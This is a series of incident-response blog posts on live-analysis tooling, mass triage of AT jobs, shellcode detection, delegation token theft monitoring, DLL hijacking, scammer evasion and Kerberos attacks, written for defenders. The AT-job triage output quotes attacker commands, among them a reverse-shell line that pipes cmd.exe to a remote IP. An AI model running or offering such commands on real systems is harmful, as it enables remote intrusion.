Turning a Snapshot into a Story: Simple Method to Enhance Live Analysis

System snapshots are a core component when conducting forensic analysis on a live machine. They provide critical insight into what was going on at the time they were taken, but this is also their limitation: your view is limited to a precise moment in time, without context and the opportunity to observe changes as they occur.

Take an example of malware analysis – you’ve executed a malicious process within a virtual machine and run strings against the process memory. This can be exceptionally useful at obtaining information such as IP addresses and configuration information, but what if the sample hasn’t had the chance to contact it’s C2 server yet? You may not get the information you desire at the precise moment you execute the strings command.



Whilst considering options on how to expand on the snapshot and monitor system changes in real time, I experimented with several ideas including development of a system driver, or using Kernel Tracing, all of which were fairly complex, when it struck me – a snapshot is like a picture, and if you put together enough pictures, one after another and play them quickly, you end up with a film!

Eight lines of Python later I developed a proof of concept which works pretty well. It was designed to be flexible enough to allow the user to decide what snapshot tool was to be monitored, and the frequency to do so. Every iteration, it gathers the output from the executed subprocess and compares it against an array of previously observed results. If there is something new, that hasn’t been seen before, it displays it to the user along with a timestamp, and then adds it to the array to prevent future duplication.




Let’s play through an example. In the image below I have decided to dump the strings from process id 5284, which is a browser. I am piping the output into grep and only interested in strings that contain the phrase ‘cyberkramer’. When the script starts it will do a first pass against the process memory and store all the results it finds that meet the criteria into an array within the script. A second later, it will re run the process strings dump – as it has seen the same strings previously, they will not be displayed again. However, if I then typed cyberkramer_writes_code into the URL bar, it will find a new string in memory and display it to me along with the timestamp at which it was found.




Another example to demonstrate the flexibility of script is to run it against netstat. In this case I am only interested in results that contain “123”. When the script was first run at 12:39:38 I was presented with two lines ending * : *, at this point the script had stored the baseline values. I then loaded a browser a visited, and at 12:40:11 the script detected the new line output by netstat during that iteration, and it was presented it to me.



Tools such as Process Monitor can assist with monitoring for operating system changes, but here are a few examples of utilities not covered by traditional behavioural monitoring tools which it may be useful to try with:

The source code is available from my github repo – please feel free to fork and alter to suit your needs.

I would be very interested to hear your feedback and hope this is of some use to you. It can be used against any program which produces results via the command line, and may be especially useful for malware specialists conducting behavioural analysis.

Happy reversing!


Mass Triage Part 3: Processing Returned Files – At Jobs

Our story so far…
Frank, working with Hermes, another security analyst, goes to work to review the tens of thousands of files retrieved by FRAC. They start off by reviewing the returned AT jobs.

AT Job Used by Actors

AT jobs are scheduled tasks created using the at.exe command. At jobs take the filename format of at#.job, where # represents an increasing counter (e.g. at1.job or at42.job).  They are used by actors for lateral movement and/or execution of their tools on a machine. The AT jobs will run as the SYSTEM user thus giving the actor access needed for their tools to run. The jobs can be scheduled remotely, too. There are plenty of articles on how AT jobs are used by actors. If you are unfamiliar with how AT jobs are created, please see Microsoft’s web site at: https://support.microsoft.com/en-us/help/313565/how-to-use-the-at-command-to-schedule-tasks

I’ll show some example actor AT jobs later in the blog post.

AT Job Analysis

Out of all the files that will get reviewed, AT job analysis takes the least amount of time. Thousands of jobs can be reviewed quickly using frequency analysis. Frequency analysis is where lines of tool output is sorted, counted, and reduced via the uniq command. Using frequency analysis an analyst can usually determine as normal or legitimate those lines with higher frequency counts. For example, let’s say that you have 1000 machines and all 1000 machines have the same AT job. Chances are that AT job will be legitimate. APT AT jobs are usually on a smaller set of machines. Let get into how to process the AT jobs and some example output.

To process the AT jobs here are the steps:

  1. find . -name “at*job” -print -exec jobparser.py -f {} \; > {output file from step 1}
  2. grep Parameters {output file from step 1} | cut -d: -f 2- | sort | uniq -c | sort -h >  {review filename}.txt

After running the AT jobs through Jamie Levy’s jobparser.py (https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/jobparser.py), the primary line in the output that needs to be reviewed is the Parameters line. Below is example output from a single AT job from the output file from Step 1:

Product Info: Windows 7
File Version: 1
UUID: {260A6E48-9D8E-46C1-9511-12414604B249}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 1
Status: Task is ready to run
Date Run: Tuesday Oct 20 08:16:00.123 2015
Running Instances: 0
Application: cmd.exe
Parameters: /c start.vbs
Working Directory: Working Directory not set
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Oct 20 08:16:00.0 2015

Note the “Parameters” line in bold. This is the line that can be used to key off of for doing a mass file review. While the other data is interesting and useful, the “Parameters” line can be used to help identify which jobs the analysts needs to take a closer look at.

Step 2 Output:

1  /C "C:\xcf\bin\purgeold.bat 30"
1  /C "C:\xcf\bin\CCleanup.bat 4g"
1  /c c:\users\fred\ab.exe>thumbs.dll
1  /c "wde.exe >1.dll"
1  /c wde.exe>1.dll:
1  /c wde.exe>1.dlL
1  /c wde.exe>1.dlL'
1  /c wde.exe>>1.dLL
1  /C "pushd C:\xcf\hist && C:\xcf\bin\purgelog *.hst 7 >hstpurge.log"
1  /c "ght.exe -x>1.dll"
1  /c "ght -x>2.dll"
3  /c "start c:\users\admin\appdata\local\temp\vc connect xxx.xxx.xxx.xxx:80 -e cmd.exe -v"
4  /c system.bat
8  /c "taskkill /f /im wscript.exe"
10  /c wde.exe>1.dll
11  /c start.vbs
200  /C "C:\Program Files\Cisco Systems\CTIOSServer\purgeold.bat 30"

Can you spot the badness?  Nearly everything in the list is bad. The only lines that are not bad are the ones ending in “purgeold.bat 30”, “CCleanup.bat 4g”, and “hstpurge.log”. The other jobs listed in the above output are APT related. To briefly discuss the columns above in the output. The number (first column) represents that number of lines found in the “{review filename}.txt” file. For example:

11  /c start.vbs

There were 11 AT jobs that ran “/c start.vbs”.

Next Steps

As I go through the Step 2 output file, I typically will put an identifier, such as “#km ”, at the end of the line so that I can grep my identifier out later for the lines I find interesting. Then to trace it back to the AT job file by searching the output file from Step 1 for the lines identified as interesting and review the rest of the AT job details. See the example AT job ./machine13/At2.job from above.

Note that due to the “-print” option given to the find command it prints out the directory path and file name for AT job before showing the jobparser.py’s output. If FRAC/RIFT was used, the hostname of machine where the AT job came from will be in the directory path. Depending on the contents of the AT job, the machine may require further triage or a deeper analysis.

The parsed AT jobs above show the following tools used by the actor:

  • wde.exe
  • ght.exe
  • c:\users\admin\appdata\local\temp\vc
  • system.bat
  • taskkill
  • start.vbs

One of the tasks the analysts needs to do next is track down these tools and review them. Per the list there was only one tool with a full path. FRAC could be used to search the entire network for these tools. A custom getfileslist.txt could be written to gather up these tools. The following is some example lines to that for the getfileslist.txt file:

  • wde.exe$
  • ght.exe$
  • system.bat$
  • start.vbs$
  • \/users\/admin\/appdata\/local\/temp\/vc*

Note that “taskkill” was not added. The “taskkill” binary is part of the Windows OS. It doesn’t make sense to pull these back as every system will have it.  However, the analyst should work with the administrators to determine if the use of “taskkill” was part of administrator activities.

Lastly, the date run and scheduled date fields for determined actor AT jobs, should be added to the incident time line. These dates and times can be used to for time line analysis of the system where the AT jobs were scheduled. Also, the dates and times may useful for log analysis and network forensics.

Next in Part 4

In Part 4, I will discuss processing the ShimCache from the SYSTEM hives that were collected using FRAC with regards to mass triage.


Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

Mass Triage: Retrieve Interesting Files Tool (FRAC and RIFT) Part 2

Our story so far…
Frank, security analyst, reviews the files uploaded by Tony. During the review, Frank notes that AT jobs were used to run malicious tools on Bob’s machine. Some of the AT jobs show some unknown batch files being ran during the same time frame as the malicious tools. It is possible that the actors have moved latterly within the network. Outside of the AT jobs, the ShimCache shows WinRAR being ran, among other things.

Frank decides that he should scan all 15,000 endpoints and servers for signs of the actors. He’ll pull the normal system files for triage and search for the Indicators of Compromise (IOCs) he found on Bob’s laptop. Frank calls management to let them know his next steps and kicks off FRAC.

Many organizations, large and small, struggle with conducting a mass triage during an incident. The two biggest problems they face is:
1) Gathering up the required files
2) Searching for signs of activity

Forensic Response ACquistion (FRAC) and Retrieve Interesting Files Tool (RIFT) were written to address problem 1. FRAC can be configured to sweep across an enterprise and gather up the files required for triage. Once the files have been gathered up, another toolset is required to process the files (i.e. problem 2). I’ll detail solutions for problem 2 in the next article.

How It Works: FRAC and RIFT

FRAC is a GPLv2 project that can run remote commands across a Windows enterprise network. It consists of a Perl script, basic configuration files, and an SMB share. It uses PAExec or Winexe to connect to the remote machines, and then runs the commands required. It doesn’t require a powerful system to run from, but does require lots of disk space if it has been configured to collect files. FRAC can run on the Linux, *NIX, and OSX using Winexe to connect to the remote Windows machines. As long as you can get Winexe compiled for the operating system you’re golden. On the Windows side, PAExec was chosen because it is open source and doesn’t produce any pops or signs that is running on the remote machine. Due to requirement for System level privileges to access the $MFT, PSExec, while it does work, had a pop-up that told the user that it was running. In a triage file-gathering scenario, you don’t want your users killing the processes that are used to gather the files or run commands on the remote machine.

FRAC reads in a file containing either IP addresses or a range of IP addresses. It also reads in the cmd.txt file that contains the command that FRAC will execute. Upon reading this data, it will then start contacting remote machines.

FRAC is threaded. By default, FRAC will reach out to 25 machines at a time. Once a machine is finished processing, FRAC will kick off new threads until there are no more IP addresses remaining. In testing, 25 seemed to work better than a greater number. It should be noted that using FRAC to download very large files from multiple machines could impact the network. Think about what is likely to come across the network and set the number of threads to what your network could handle. This is one of those cases where it’s better to test before kicking it off live on the network.

To gather files, Retrieve Interesting Files Tool (RIFT) is used as the command that FRAC will run on each remote machines. RIFT requires parts of Sleuthkit and a SMB share to store the retrieved files. When RIFT kicks off on the remote machine, it reads in the regex list of files/directories and then uses Sleuthkit’s FLS to start parsing the $MFT. RIFT will create a directory with the hostname of the machine on the SMB share it was given. Then as the $MFT is parsed, RIFT will use Sleuthkit’s ICAT to copy the files/directories over to the SMB share. The directory structure will be recreated for where the files were found on the SMB share under the hostname. For example, if the registry files were copied over, there would be a directory structure that looks like this:

{hostname}/windows/system32/config/{registry hive}

In other words it would look like this for pulling the SYSTEM hive from a workstation called Workstation13:


Once RIFT has complete parsed the $MFT, it will end and return execution to FRAC. Overall there is very little impact to the machine itself as far as resources such as CPU & memory usage go.

If RIFT isn’t run with FRAC, any other command could be run on the remote machines. For example, a batch script can be used to kick off winpmem to capture memory on the remote machine. Beware doing this type of activity across the board on your network. Capturing memory over the network should be done on a case-by-case basis.

FRAC tracks IP addresses that cannot be reached and writes those addresses to a text file. Once, FRAC is finished going through the IP addresses, the analyst can re-kick off the scan using generated text file to try those IP addresses that failed.

FRAC can be downloaded at:

Be sure to review the documentation on FRAC and RIFT for additional details on how to setup and use the tools.

In Part 3, I will start discussing mass triage and how to process those hundreds of files recovered by FRAC into a meaningful manner that isn’t time consuming. The goal of conducting mass triage to get answers quickly in the areas of:

  • Which machines were accessed by the actors
  • Tools and methods used by the actors
  • Determine which machines need further analysis
  • Maybe identifying any exfil tools used

Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

Mass Triage: Retrieve Interesting Files Tool (RIFT) Part 1

Our story so far…

Frank, a security analyst, is reviewing network traffic and notes that the VP of Merger and Acquisitions’ machine has transmitted a 2 gig encrypted RAR file to http://doggydaycareforvps.com. Frank notifies management and managments gets Bob, the VP, to contact Frank regarding the file. Later, Frank learns that Bob did not upload the file nor has Bob visited the site the file was sent to. Frank requests that Bob drop off his laptop to the company’s satellite site near the hotel that he is stay at so that they can pull some files.

Bob drops off his laptop to the desktop support staff at the satellite site. Where Tony picks it up and calls Frank to see what he needs to do with the machine. Frank asks him to run the RIFT tool on it and upload the files to the SFTP server after it is finished.

In the course of an incident incident responders will have to retrieve files from a machine in a forensically sound manner. RIFT copies files from a subject machine in a forensically sound manner using the Sleuthkit toolset. By simply running RIFT with a regex list of file names or directories, specific files and folders are targeted for extraction. For each match, icat is then used to copy the file or folder to a drive/share other than the C drive.

The customizable regex list file, called getfileslist.txt, consists of a list of file names or directories to pull from the machine RIFT is run on. Below is subset of the file that comes with RIFT:

#Get the system hive
#Get the software hive
#Get the contents of the Prefetch directory

RIFT will ignore any lines starting with a # symbol as comments. The lines containing SYSTEM and SOFTWARE are examples of getting a single file. The last example containing prefetch directory will retrieve the entire contents of the prefetch directory. The directory structure is recreated on the destination as the files and directories are copied over. Lastly, the output from fls is saved to the destination drive/share.

To run, all the user needs to do is run rift.exe with the savedrive argument as shown in the figure:


RIFT can be downloaded at: https://github.com/chaoticmachinery/fate/tree/master/frac_rift

In Part 2, I’ll discuss using FRAC to pull files network wide for mass triage.

Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

DFIR Summit 2016 – Call for Papers Now Open


The 9th annual Digital Forensics and Incident Response Summit will once again be held in the live musical capital of the world, Austin, Texas.

The Summit brings together DFIR practitioners who share their experiences, case studies and stories from the field. Summit attendees will explore real-world applications of technologies and solutions from all aspects of the fields of digital forensics and incident response.

Call for Presentations- Now Open
More information 

The 9th Annual Digital Forensics and Incident Response Summit Call for Presentations is now open. If you are interested in presenting or participating on a panel, we’d be delighted to consider your practitioner-based case studies with communicable lessons.

The DFIR Summit offers speakers the opportunity for exposure and recognition as industry leaders. If you have something substantive, challenging, and original to offer, you are encouraged to submit a proposal.

Deadline to submit is December 18th, 2015.

Summit Dates: June 23 & 24, 2016
Post-Summit Training Course Dates: June 25-30, 2016

Submit now 

Detecting Shellcode Hidden in Malicious Files

A challenge both reverse engineers and automated sandboxes have in common is identifying whether a particular file is malicious or not. This is especially true if the malicious aspects are obfuscated and only triggered under very specific circumstances.

There are a number of techniques available to try and identify embedded shellcode, for example searching for patterns (NOP sleds, GetEIP etc), however as attackers update their methods to overcome our protections it becomes more difficult to find the code without having the exact version of the vulnerable software targeted, and allowing the exploit to successfully execute.

In this post, I will discuss a new technique I have been experimenting with, which approaches this issue from a different perspective, forcing the execution of the exploit code, no matter what software you have installed. It is based on two core principles:

  1. If you try and execute something that isn’t code (e.g. a text string), the program will likely crash as the machine code interpretation of this data is unlikely to make much sense.
  2. If you begin executing code from the start (i.e. wherever the instruction pointer would have been set during the exploitation phase), it will run to completion – no matter how obfuscated the instructions are.

So here’s my theory: If we attempt to “execute” the contents of a malicious file (such as a pdf), byte by byte, catching the exceptions as the program continually crashes and then increasing the instruction pointer by one each time, we will eventually come across any malicious code contained therein which will be triggered, run to completion, and provide indicators of its malicious nature through behavioural analysis.

The experiment

In order to test this concept, I wrote a program which does the following:

  • Maps the requested file to memory (i.e. make a full copy of it in memory).
  • Set the instruction pointer to the first byte, and allow it to run.
  • It will probably crash! (The instructions won’t make sense!!)
  • Catch the error, and use the error handler to increase the instruction pointer by one.
  • Try again, and again, and again…
  • If the file contains shellcode, you should eventually hit it, and it will run – hurrah!
Demonstrating the concept
Step 1 – Generating malicious document and starting metasploit reverse handler

We begin by generating a malicious pdf document containing the reverse_tcp metasploit payload, and starting the handler to await incoming connections. The attacker is now waiting for the victim to open the file with a vulnerable pdf reader, at which point it will connect back to the attackers machine.


Step 2 – Dealing with the malicious pdf

Now, let us imagine we are conducting an analysis on this document (either manually, or using an automated sandbox) – the issue we are going to have in this case, is that we are unlikely to have the vulnerable version of the software installed, the exploit won’t work, and we will be none the wiser that it exists! This isn’t to say that the intended victim doesn’t have the vulnerable version installed.

Let us try running the PDF through our proof-of-concept shellcode hunter…


Step 3 – Bingo – shellcode has been located and triggered

As we can see below, the shellcode in the document has been triggered and established a connection back to the metasploit listener! If we were conducting a behavioural analysis, we would be able to identify the suspicious activity and take appropriate action.


Video demo

Check out the video demo if you’d like to see this in action live:


Code sample

If you’re interested in testing the concept, or integrating it into your software (anyone fancy writing a cuckoo module?) – The code I used was pretty simple, and looked like this:


It could definitely be a lot more advanced than the proof of concept I wrote for this demo, for example, if the shellcode started with a JMP $-2 instruction it would trap this code by causing an infinite loop. This could be potentially overcome using multi-threading to continue the search after the first code block has been found.

You may have to play with your compiler settings to get this to work. I set Visual Studio to compile with the ‘Debug’ configuration and switched off some of the protections. If you need some help getting it working, send me a tweet.

I will be presenting this and a few other concepts during a session at SANS London in a couple of weeks, if you’re attending the conference – it would be great to have you along!

Let me know what you think!

Follow me on Twitter: @CyberKramer

Monitoring for Delegation Token Theft

Delegation is a powerful feature of Windows authentication which allows one remote system to effectively forward a user’s credentials to another remote system.  This is sometimes referred to as the “double-hop”.  This great power does not come without great risk however, as the delegation access tokens used for this purpose can be stolen by attackers and used for lateral movement.  As such, it’s important to be aware of this ability and to increase monitoring for malicious use of delegation.

In order to monitor delegation activity, you need to identify where delegation is occurring.  Then from those in-scope systems where delegation occurs, look for suspicious activity, and potentially identify which users’ accounts were actually delegated.  I’ll take you through these identification steps, but first let’s start with a quick refresher on delegation.  This should give you most of the background you need, although you can get even more details about the delegation process in my article on Safeguarding Access Tokens, including some screenshots showing token theft in action.  There are also some updates on token protection in a more recent article, Restricted Admin and Protected Users.

Delegation Overview

Delegation is a powerful feature that allows a user’s authentication and identity information to be forwarded from one system to another.  The most common use of delegation is to enable multi-tier solutions, such as SharePoint.  With SharePoint, the typical architecture is to have a front-end web server and a back-end database server.  It’s the web server that a user directly interacts with, giving the web-portal view of documents, calendars, lists, etc.  However, the actual data (the documents, calendars, lists, etc.) reside on a back-end database server.  As users directly connect to the front-end web server, the back-end database server also needs to know who the user is so that it can make decisions about which data the user is allowed to access.  With delegation, the user authentication to the front-end server is effectively forwarded, or passed, to the back-end server so that it can have the same user identity information necessary to make access decisions.  Here’s a graphic illustrating this architecture:


A system “Trusted for Delegation” is able to create the “delegate-level” access token that can effectively be forwarded to another system in the domain.  Because of the sensitive nature of delegation, most systems are unable to perform delegation.  In the example above, however, this capability must be granted to the front-end web server so that it can forward the credentials to the back-end database server that holds the data.

Of course the big security risk here is that if attackers compromise the front-end web server, then they can steal delegate-level tokens of connecting users and use them to authenticate as those users to other systems in the domain.  That’s why, from a defensive perspective, it’s important to know where delegation is occurring in your environment in order to increase monitoring for potentially malicious activity.

Locating Delegation Activity

Both computer accounts and user accounts have the ability to be “Trusted for Delegation”.  Fortunately, neither users nor computers (other than domain controllers) are trusted to perform delegation by default because this is a very sensitive (and risky) privilege.  This privilege should only be granted in relatively rare circumstances.  Here’s a look at both the computer account “Delegation” tab and the user account “Delegation” tab (to see the Delegation tab for a user account, that user has to have a Service Principle Name (SPN) registered to it, as described here):



Although delegation should be enabled rarely, for a large organization with thousands of user and computer accounts, rare can still mean dozens of accounts with this ability.  With this in mind, I recently spent some time trying to determine an effective way to sift through thousands of Active Directory accounts, both users and computers, in order to find which are trusted for delegation.  What I found was a PowerShell module that could help determine these settings.  Before showing you the PowerShell command, notice from the “Delegation” screenshots above that there are 3 ways to enable delegation:

  1. Trust the computer/user for delegation to any service (Kerberos only)
  2. Trust the computer/user for delegation to specified services with Kerberos only
  3. Trust the computer/user for delegation to specified services with any authentication protocol

For #1 (Trust for delegation to any service–Kerberos only), there is a corresponding Active Directory attribute simply named “TrustedForDelegation”.  For #3 (Trust for delegation to specified service with any authentication protocol), it also has a corresponding AD attributed, named “TrustedToAuthForDelegation”.  For #2 (Trust for delegation to specified service with Kerberos only), I was unable to find a specific AD attribute.  However, we can get at this by recognizing that in order to be trusted for delegation to a specified service, a Service Principle Name (SPN) must be registered to that account.  That registration is stored in an attribute named “msDS-AllowedToDelegateTo”.  We can use this fact to infer when an account is trusted for delegation to a specified service with Kerberos only (#2).

Using a pair of PowerShell cmdlets from the “Active Directory Module for Windows PowerShell”, we can query the properties of every domain account and return just those that are trusted for delegation.  Here’s what it looks like in the console:


In this screenshot, I have an example of each type of delegation setting:

  1. SVILLE: This computer has setting #1 enabled because the “TrustedForDelegation” attribute is set to TRUE.
  2. SEATTLE: This computer has setting #2 enabled.  This is the one we have to infer.  Since it has an SPN registered to it, but is not “TrustedToAuthForDelegation”, it must be trusted for delegation to specified services with Kerberos only.
  3. DENVER: This computer has setting #3 enabled because the “TrustedToAuthForDelegation” attribute is set to TRUE.  (It also must have a registered SPN since it is for specific services only, thus it will also have one or more entries in the “msDS-AllowedToDelegateTo” attribute.)

For a large domain, it would be better to output this data to a file so you can manipulate it easier.  Here’s the command again, but this time output to CSV:

Get-ADComputer -Filter * -Properties Name,Description,msDS-AllowedToDelegateTo,TrustedForDelegation,TrustedToAuthForDelegation | Where-Object {$_.TrustedForDelegation -eq 'True' -or $_.TrustedToAuthForDelegation -eq 'True' -or $_.'msDS-AllowedToDelegateTo' -ne $null} | Select-Object Name,DNSHostName,Description,@{name='msDS-AllowedToDelegateTo';expression={$_.'msDS-AllowedToDelegateTo' -join ";"}},TrustedForDelegation,TrustedToAuthForDelegation | Export-Csv AdComputer-Delegation.csv

Once the results are brought into a spreadsheet and cleaned up a bit, it will look something like this:


The previous command (Get-ADComputer) will check computer accounts in the domain.  A similar command (Get-ADUser) will check user accounts:

Get-ADUser -Filter * -Properties Name,Description,msDS-AllowedToDelegateTo,whenCreated,PasswordLastSet,SamAccountName,ServicePrincipalNames,TrustedForDelegation,TrustedToAuthForDelegation | where {$_.TrustedForDelegation -eq 'True' -or $_.TrustedToAuthForDelegation -eq 'True' -or $_.'msDS-AllowedToDelegateTo' -ne $null} | Select-Object Name,SamAccountName,Description,whenCreated,PasswordLastSet,@{name='ServicePrincipalNames';expression={$_.'ServicePrincipalNames' -join ";"}},@{name='msDS-AllowedToDelegateTo';expression={$_.'msDS-AllowedToDelegateTo' -join ";"}},TrustedForDelegation,TrustedToAuthForDelegation | Export-Csv AdUser-Delegation.csv


With the output from these two commands, you can determine which accounts are trusted for delegation.  This goes most of the way to answering our first question:  Where can delegation occur?  From the commands above, we have a set of computer accounts that are trusted for delegation, so we’d want to enable enhanced monitoring on those computers.  But what about the user accounts?  Do we have to enhance monitoring on every computer those accounts are used?  It depends.  For accounts that are trusted to delegate only for specific services, the direct way to answer this is by utilizing the registered SPNs for the user account.

In my example just above, the “Service Account” user is trusted for delegation, but where is that delegation occurring?  It is occurring for sharepoint on seattle, as indicated by the SPN in the msDS-AllowedToDelegateTo attribute.  By definition, the Service Principle Name specifies a named service on a named computer (or computer alias).  As such, we can use this fact to identify where the user is performing delegation.  Back to the example, even if the computer account SEATTLE doesn’t show up as a computer trusted for delegation, we now know that we should increase monitoring on that computer because there is a service account allowed to perform delegation on that machine.

So that works well for user accounts that are trusted to delegate for specific services.  When user accounts are trusted for delegation to any service, then you’ll need to analyze the usage of those accounts to determine when, where, and how they are used.  These accounts are typically used to run services, so look for computers where these users perform Type 5 logons, found in Event ID 4624 event logs.

Monitoring Delegation in Event Logs

Simply knowing where delegation is occurring is a big piece of the puzzle.  I’d recommend gathering event logs and application logs (such as SharePoint logs and antivirus logs) from relevant computers for both real-time alerting of suspicious activity and historic events for forensic purposes.

As far as determining exactly which accounts were delegated, that really wasn’t possible prior to Windows 8 and Server 2012.  There was no simple way to determine if a delegation token was created for a user when they logged onto a machine.

Fortunately, that has been resolved starting with Windows 8 and Server 2012.  Event ID 4624 now specifies the impersonation type that was created when a user logs on.  This can be important for both proactively assessing the types of accounts that are performing delegation (i.e., are there any highly privileged accounts being delegated?), as well as forensically analyzing accounts that may have been exposed during a compromise.  Here’s a look at the updated 4624 event logs:



What if delegation is occurring on older operating systems, such as Windows Server 2008?  In that case, we cannot determine specifically which accounts were delegated.  However, you can still infer which accounts were delegated based on the fact that the computer performs delegation.  Ideally you would tie application logs to event logs to show that not only did a user of interest logon, but also the user utilized a service that is performing delegation (such as SharePoint).  Even without the application logs though, simply knowing that an account of interest connected to a compromised server that performs delegation can be enough to follow the lead of credential theft and lateral movement.

Finally, we should be on the lookout for suspicious activity that could indicate delegate-level token theft.  Like many things in this field, this can be as much an art as it is a science.  There could be any number of attacker tools that have this capability, so essentially you want to look for unusual activity on the computers performing delegation.  That said, I’m only aware of two openly available tools that perform token theft:  Incognito.exe by Luke Jennings and the incognito module for Metasploit.  For incognito.exe, it runs as a service, so this can be a useful thing to watch out for in event logs, particularly the System event log that records changes to Windows services.  Here’s an example from running incognito.exe on a Windows 8.1 host:


When testing the incognito module for Metasploit, I did not see an incognito service created or anything else to specifically indicate the use of incognito.  However, there were other suspicious event logs that should raise concern in an investigation.  For example, while using Metasploit’s meterpreter payload to run various commands, including the incognito module, the following pseudo-randomly named service and process were created:



By the way, the “Process Command Line” shown above is an added feature to Process Tracking event logs that has been available in Windows 8.1 and Server 2012R2 from the beginning and was just recently made available in Windows 7/8 and Server 2008R2/2012.  This is a very useful feature update.  For more information, see Microsoft Security Advisory 3004375.  Keep in mind though, this would be a security risk for processes run with passwords included in the command line parameters.  This could apply to batch scripts and other administrative tools that might inadvertently record sensitive passwords in the event logs.


Delegation is a very powerful and useful feature, though it comes with an equal amount of risk.  Therefore, it is important to use delegation sparingly, and where it is in use, apply additional monitoring and detection capabilities.  As discussed in this article, you’ll want to scope the systems in your environment that are trusted for delegation and then be on the lookout for suspicious activities from these systems.  As discussed in the previous articles on this topic, also make sure your highly privileged accounts are explicitly disabled for delegation.


Mike Pilkington is a Sr. Information Security Consultant and Incident Responder for a Fortune 500 company in Houston, TX, as well as a SANS instructor teaching FOR408 and FOR508. Find Mike on Twitter @mikepilkington.

Detecting DLL Hijacking on Windows

Initially identified fifteen years ago, and clearly articulated by a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code), rather than the legitimate library by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order which is a pre-defined standard on how Microsoft Windows searches for a DLL when the path has not been specified by the developer.

Despite published advice on secure development practices to mitigate this threat, being available for several years, this still remains a problem today and is an ideal place for malicious code to hide and persist, as well as taking advantage of the security context of the loading program.
Continue reading Detecting DLL Hijacking on Windows

How Miscreants Hide From Browser Forensics

Scammers, intruders and other miscreants often aim to conceal their actions from forensic investigators.  When analyzing  an IT support scam, I interacted with the person posing as the help desk technician. He  brought up a web page on my lab system to present  payment  form, so I’d supply my contact and credit card details. He did this  in a surprising manner, designed to conceal  the destination URL.

You can see the scammer  bringing up the web page by watching this 17-second video of his actions.  Rather than bringing up the web browser, the person  launched  the HTML Help application, which is built into Windows, by typing:

hh h

According to Microsoft, HTML help is “the standard help system for the Windows platform. Authors can use HTML Help to create online help for a software application or to create content for a multimedia title or Web site.” To bring up the interface captured in the above video, it’s sufficient to launch the application using the “hh” command and supply any string as a parameter.

Why would the miscreant launch this application? The goal is to use the “Jump to URL…” feature, which is available by clicking in the top left corner of the application:

HTML Help: Jump to URL


The  “tech support” rep then pasted the desired URL from the clipboard into the Windows that popped up. Since the input field of the Window was relatively small, I (posing as the victim) could not see the full URL.

The web page rendered within the HTML Help window, the way it would show up within a browser, though  there was no URL bar to display the address of the page:

ClickBank Payment Form

Examining the system after this incident, I could not find a reference to the ClickBank URL in the Internet Explorer history. I used  ESEDatabaseView  to examine the system’s  WebCache file; the tool found a cookie set by ClickBank, but showed no relevant URLs.  I also used Redline to pull out browser artifacts from this system using memory forensics; this tool showed some URLs belonging to the clickbank.net domain, but not the address of the initial web page:

Redline Clickbank URLs

I was able to locate the URL by extracting all strings from the system’s memory image that included “clickbank” in them. The same URL was also left by the adversary on the system’s clipboard.

Based on this analysis, it appears the adversary used an unusual method of visiting the website from the victim’s system to conceal the URL from the person’s view and to make it hard  for  an  investigator to locate the URL in the browser history. This is the first time I’ve seen such an approach, and wanted to share it with the community. If you’ve encountered  similar techniques or would like to share your perspective on this situation, please leave a comment.

To learn more about this incident, take a look at  my  Conversation With a Tech Support Scammer article.

—  Lenny Zeltser

Lenny Zeltser teaches  malware analysis at SANS Institute and focuses on safeguarding customers’ IT operations at NCR Corp. He  is active on Twitter  and writes a security blog.

Kerberos in the Crosshairs: Golden Tickets, Silver Tickets, MITM, and More

It’s been a rough year for Microsoft’s Kerberos implementation.  The culmination was last week when Microsoft announced critical vulnerability MS14-068.  In short, this vulnerability allows any authenticated user to elevate their privileges to domain admin rights.  The issues discussed in this article are not directly related this bug.  Instead we’ll focus on design and implementation weaknesses that can be exploited under certain conditions.  MS14-068 is an outright bug which should be patched immediately.  If you haven’t patched it yet, I suggest you skip this article for now and work that issue right away.  Then come back later for some more Kerberos fun!

Our red-team friends have been quite busy recently dissecting Kerberos and have uncovered some pretty concerning issues along the way.  Issues, or attacks, such as the “Golden Ticket”, the “Silver Ticket”, man-in-the-middle (MITM) password cracking, and user passwords being reset without user knowledge have all been discovered, disclosed, or advanced over the past few months.  These techniques can allow for credential theft, privilege escalation, and impersonation—goals in just about any advanced attack.  As incident responders, these are issues we should definitely understand in order to “Know thy enemy”.  So let’s get to it.  We’ll start with a discussion of the Kerberos architecture and see how the placement of a compromised host impacts the security of the design.

Kerberos Architecture

In my previous article on network authentication, I presented the following diagram to show how Kerberos addresses the man-in-the-middle design weakness we face with NTLM:

This architecture addresses the man-in-the-middle issue for our privileged accounts that are connecting to compromised hosts.  It allows the user authentication to take place between the trusted client and the DC.  The DC then provides a non-forwardable, target-specific “ticket” to use for connecting to the remote compromised host.  That works great for our IR account scenario, as well as many other scenarios where privileged accounts are reaching out to untrusted hosts.

However, several Kerberos weaknesses come to light when the situation gets flipped around.  If we make the compromised host the client, rather than the target, then we see several issues arise. Here’s that same diagram with the scenario flipped, along with a fuller description of the Kerberos steps and a summary of the issues/attacks raised recently:



Seeing all these issues in one diagram looks pretty ominous.  Fortunately these issues are not deal-breakers for Kerberos, but they should get your attention and hopefully are getting Microsoft’s attention as well.

I’m going to describe each of these issues while stepping through the Kerberos authentication process.   I’ll then provide a few thoughts on mitigations.  First though, let’s start with a high level description of Kerberos.

Kerberos Overview

Microsoft’s implementation of Kerberos allows users (UPN: user principal names) to authenticate to services (SPN: service principal names)—such as CIFS, Terminal Services, LDAP, WS-Management, and even the local host itself (the local host is treated as a service when you perform an interactive logon with a domain account).

Authentication is first done between the user and a trusted 3rd-party called the Key Distribution Center (KDC), which is the domain controller in Microsoft domains.  This initial authentication is done via the user’s long-term key, which is derived from the user’s password in most environments.

